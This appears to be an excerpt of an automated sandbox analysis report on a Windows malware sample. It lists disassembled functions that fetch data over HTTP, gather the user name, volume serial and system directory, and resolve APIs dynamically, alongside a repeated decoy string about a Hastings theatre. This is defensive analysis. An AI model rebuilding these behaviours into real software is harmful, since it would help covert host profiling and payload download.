                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D46B2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4672
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D467D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4763
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4712
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D478F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4688
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4707
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D4779
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D471D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D47CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 7f737f3a4eb103eee06325281a8ece4ebc2619ea724f4b313a47775b6cb46d69
                            • Instruction ID: cb4d61ee81fd9527132fb6e9810f9b10ea8f7ff9f50523281954532fffea3c05
                            • Opcode Fuzzy Hash: 7f737f3a4eb103eee06325281a8ece4ebc2619ea724f4b313a47775b6cb46d69
                            • Instruction Fuzzy Hash: 0541F9606C2E1F6EE634B7A78D42DBF77975F42709FA07064EB005A782CBF0650075AA
                            Function 000D62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 d62d0-d635b call eaab0 call d4800 call eaa50 InternetOpenA StrCmpCA 1040 d635d 1033->1040 1041 d6364-d6368 1033->1041 1040->1041 1042 d636e-d6392 InternetConnectA 1041->1042 1043 d6559-d6575 call eaab0 call eab10 * 2 1041->1043 1045 d654f-d6553 InternetCloseHandle 1042->1045 1046 d6398-d639c 1042->1046 1062 d6578-d657d 1043->1062 1045->1043 1048 d639e-d63a8 1046->1048 1049 d63aa 1046->1049 1051 d63b4-d63e2 HttpOpenRequestA 1048->1051 1049->1051 1053 d63e8-d63ec 1051->1053 1054 d6545-d6549 InternetCloseHandle 1051->1054 1056 d63ee-d640f InternetSetOptionA 1053->1056 1057 d6415-d6455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 d647c-d649b call e8ad0 1057->1058 1059 d6457-d6477 call eaa50 call eab10 * 2 1057->1059 1067 d649d-d64a4 1058->1067 1068 d6519-d6539 call eaa50 call eab10 * 2 1058->1068 1059->1062 1071 d6517-d653f InternetCloseHandle 1067->1071 1072 d64a6-d64d0 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 d64db 1072->1076 1077 d64d2-d64d9 1072->1077 1076->1071 1077->1076 1080 d64dd-d6515 call eacc0 call eabb0 call eab10 1077->1080 1080->1072
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • InternetOpenA.WININET(000F0DFF,00000001,00000000,00000000,00000000), ref: 000D6331
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6353
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6385
                            • HttpOpenRequestA.WININET(00000000,GET,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D63D5
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D640F
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D6421
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000D644D
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D64BD
                            • InternetCloseHandle.WININET(00000000), ref: 000D653F
                            • InternetCloseHandle.WININET(00000000), ref: 000D6549
                            • InternetCloseHandle.WININET(00000000), ref: 000D6553
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 5e25782fe47e2b3cf0bcfecc695afeb9cde11559b02669b499a7b39324e1c35d
                            • Instruction ID: 3fd386069d26b169fee5e7ebb4833520e883cc0c307b9d8afd7be26701bd58b0
                            • Opcode Fuzzy Hash: 5e25782fe47e2b3cf0bcfecc695afeb9cde11559b02669b499a7b39324e1c35d
                            • Instruction Fuzzy Hash: A1718071A00318EFDB24DF90DC59FEE77B8AB49300F108099F20A6B295DBB56A84CF51
                            Function 000E7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 e7690-e76da GetWindowsDirectoryA 1357 e76dc 1356->1357 1358 e76e3-e7757 GetVolumeInformationA call e8e90 * 3 1356->1358 1357->1358 1365 e7768-e776f 1358->1365 1366 e778c-e77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 e7771-e778a call e8e90 1365->1367 1369 e77b8-e77e8 wsprintfA call eaa50 1366->1369 1370 e77a9-e77b6 call eaa50 1366->1370 1367->1365 1377 e780e-e781e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000E76D2
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E770F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7793
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E779A
                            • wsprintfA.USER32 ref: 000E77D0
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 4e1113069d319dcb0de3c07e08c9570f54b091b03ebc2f90d3f7e2832da74661
                            • Instruction ID: 54e34093e2f4b1d2e400d82d07b62944ea9e8c7c3f6ffc6b8ff9bb0819a4589c
                            • Opcode Fuzzy Hash: 4e1113069d319dcb0de3c07e08c9570f54b091b03ebc2f90d3f7e2832da74661
                            • Instruction Fuzzy Hash: 6E41B2B1D043889FDB10DB95CC85BEEBBB8AF49700F104199F609BB281D7746A44CBA5
                            Function 000E79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7A10
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7A17
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E7A2F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 785894bffc79b4ab2d042ee9c24f1131b5018eaf6fd32ab11ef25163870431a9
                            • Instruction ID: 6c9c9062f6fa95ebec077940cd41284ac1e2c7f8cee237993b6d91362b1fa329
                            • Opcode Fuzzy Hash: 785894bffc79b4ab2d042ee9c24f1131b5018eaf6fd32ab11ef25163870431a9
                            • Instruction Fuzzy Hash: D9F04FB2948249EFC710DF99DD89BAEBBBCEB45711F10061AFA15A2680C77515008BA1
                            Function 000D1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 0a157a969e9abcb6709b61b2238117b89d05148287303628d79154a45c568460
                            • Instruction ID: f7abd5d3395468adf8a18a4e96e899ba7816f94f8c54df1dd1b7655394a9759b
                            • Opcode Fuzzy Hash: 0a157a969e9abcb6709b61b2238117b89d05148287303628d79154a45c568460
                            • Instruction Fuzzy Hash: E4D09E7490431CABCB04DFE09D896DDBBBCFB0D715F100555D90562341EA315455CB65
                            Function 000E9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 e9f20-e9f2a 634 ea346-ea3da LoadLibraryA * 8 633->634 635 e9f30-ea341 GetProcAddress * 43 633->635 636 ea3dc-ea451 GetProcAddress * 5 634->636 637 ea456-ea45d 634->637 635->634 636->637 638 ea526-ea52d 637->638 639 ea463-ea521 GetProcAddress * 8 637->639 640 ea52f-ea5a3 GetProcAddress * 5 638->640 641 ea5a8-ea5af 638->641 639->638 640->641 642 ea647-ea64e 641->642 643 ea5b5-ea642 GetProcAddress * 6 641->643 644 ea72f-ea736 642->644 645 ea654-ea72a GetProcAddress * 9 642->645 643->642 646 ea738-ea7ad GetProcAddress * 5 644->646 647 ea7b2-ea7b9 644->647 645->644 646->647 648 ea7ec-ea7f3 647->648 649 ea7bb-ea7e7 GetProcAddress * 2 647->649 650 ea825-ea82c 648->650 651 ea7f5-ea820 GetProcAddress * 2 648->651 649->648 652 ea922-ea929 650->652 653 ea832-ea91d GetProcAddress * 10 650->653 651->650 654 ea98d-ea994 652->654 655 ea92b-ea988 GetProcAddress * 4 652->655 653->652 656 ea9ae-ea9b5 654->656 657 ea996-ea9a9 GetProcAddress 654->657 655->654 658 eaa18-eaa19 656->658 659 ea9b7-eaa13 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00D35BB0), ref: 000E9F3D
                            • GetProcAddress.KERNEL32(74DD0000,00D35C70), ref: 000E9F55
                            • GetProcAddress.KERNEL32(74DD0000,00D49640), ref: 000E9F6E
                            • GetProcAddress.KERNEL32(74DD0000,00D49610), ref: 000E9F86
                            • GetProcAddress.KERNEL32(74DD0000,00D49658), ref: 000E9F9E
                            • GetProcAddress.KERNEL32(74DD0000,00D49688), ref: 000E9FB7
                            • GetProcAddress.KERNEL32(74DD0000,00D3B630), ref: 000E9FCF
                            • GetProcAddress.KERNEL32(74DD0000,00D4D3C8), ref: 000E9FE7
                            • GetProcAddress.KERNEL32(74DD0000,00D4D308), ref: 000EA000
                            • GetProcAddress.KERNEL32(74DD0000,00D4D320), ref: 000EA018
                            • GetProcAddress.KERNEL32(74DD0000,00D4D260), ref: 000EA030
                            • GetProcAddress.KERNEL32(74DD0000,00D35D10), ref: 000EA049
                            • GetProcAddress.KERNEL32(74DD0000,00D35C30), ref: 000EA061
                            • GetProcAddress.KERNEL32(74DD0000,00D35C50), ref: 000EA079
                            • GetProcAddress.KERNEL32(74DD0000,00D35C90), ref: 000EA092
                            • GetProcAddress.KERNEL32(74DD0000,00D4D248), ref: 000EA0AA
                            • GetProcAddress.KERNEL32(74DD0000,00D4D0F8), ref: 000EA0C2
                            • GetProcAddress.KERNEL32(74DD0000,00D3B838), ref: 000EA0DB
                            • GetProcAddress.KERNEL32(74DD0000,00D35D30), ref: 000EA0F3
                            • GetProcAddress.KERNEL32(74DD0000,00D4D200), ref: 000EA10B
                            • GetProcAddress.KERNEL32(74DD0000,00D4D338), ref: 000EA124
                            • GetProcAddress.KERNEL32(74DD0000,00D4D3E0), ref: 000EA13C
                            • GetProcAddress.KERNEL32(74DD0000,00D4D278), ref: 000EA154
                            • GetProcAddress.KERNEL32(74DD0000,00D35D90), ref: 000EA16D
                            • GetProcAddress.KERNEL32(74DD0000,00D4D2D8), ref: 000EA185
                            • GetProcAddress.KERNEL32(74DD0000,00D4D1A0), ref: 000EA19D
                            • GetProcAddress.KERNEL32(74DD0000,00D4D380), ref: 000EA1B6
                            • GetProcAddress.KERNEL32(74DD0000,00D4D110), ref: 000EA1CE
                            • GetProcAddress.KERNEL32(74DD0000,00D4D1E8), ref: 000EA1E6
                            • GetProcAddress.KERNEL32(74DD0000,00D4D350), ref: 000EA1FF
                            • GetProcAddress.KERNEL32(74DD0000,00D4D218), ref: 000EA217
                            • GetProcAddress.KERNEL32(74DD0000,00D4D128), ref: 000EA22F
                            • GetProcAddress.KERNEL32(74DD0000,00D4D230), ref: 000EA248
                            • GetProcAddress.KERNEL32(74DD0000,00D4A810), ref: 000EA260
                            • GetProcAddress.KERNEL32(74DD0000,00D4D290), ref: 000EA278
                            • GetProcAddress.KERNEL32(74DD0000,00D4D398), ref: 000EA291
                            • GetProcAddress.KERNEL32(74DD0000,00D35DB0), ref: 000EA2A9
                            • GetProcAddress.KERNEL32(74DD0000,00D4D140), ref: 000EA2C1
                            • GetProcAddress.KERNEL32(74DD0000,00D359B0), ref: 000EA2DA
                            • GetProcAddress.KERNEL32(74DD0000,00D4D368), ref: 000EA2F2
                            • GetProcAddress.KERNEL32(74DD0000,00D4D158), ref: 000EA30A
                            • GetProcAddress.KERNEL32(74DD0000,00D35830), ref: 000EA323
                            • GetProcAddress.KERNEL32(74DD0000,00D358D0), ref: 000EA33B
                            • LoadLibraryA.KERNEL32(00D4D3B0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA34D
                            • LoadLibraryA.KERNEL32(00D4D2A8,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA35E
                            • LoadLibraryA.KERNEL32(00D4D1B8,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA370
                            • LoadLibraryA.KERNEL32(00D4D170,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA382
                            • LoadLibraryA.KERNEL32(00D4D188,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA393
                            • LoadLibraryA.KERNEL32(00D4D1D0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA3A5
                            • LoadLibraryA.KERNEL32(00D4D2C0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA3B7
                            • LoadLibraryA.KERNEL32(00D4D2F0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA3C8
                            • GetProcAddress.KERNEL32(75290000,00D356D0), ref: 000EA3EA
                            • GetProcAddress.KERNEL32(75290000,00D4D3F8), ref: 000EA402
                            • GetProcAddress.KERNEL32(75290000,00D490E8), ref: 000EA41A
                            • GetProcAddress.KERNEL32(75290000,00D4D578), ref: 000EA433
                            • GetProcAddress.KERNEL32(75290000,00D358F0), ref: 000EA44B
                            • GetProcAddress.KERNEL32(6FCD0000,00D3BAB8), ref: 000EA470
                            • GetProcAddress.KERNEL32(6FCD0000,00D35850), ref: 000EA489
                            • GetProcAddress.KERNEL32(6FCD0000,00D3B928), ref: 000EA4A1
                            • GetProcAddress.KERNEL32(6FCD0000,00D4D5A8), ref: 000EA4B9
                            • GetProcAddress.KERNEL32(6FCD0000,00D4D428), ref: 000EA4D2
                            • GetProcAddress.KERNEL32(6FCD0000,00D358B0), ref: 000EA4EA
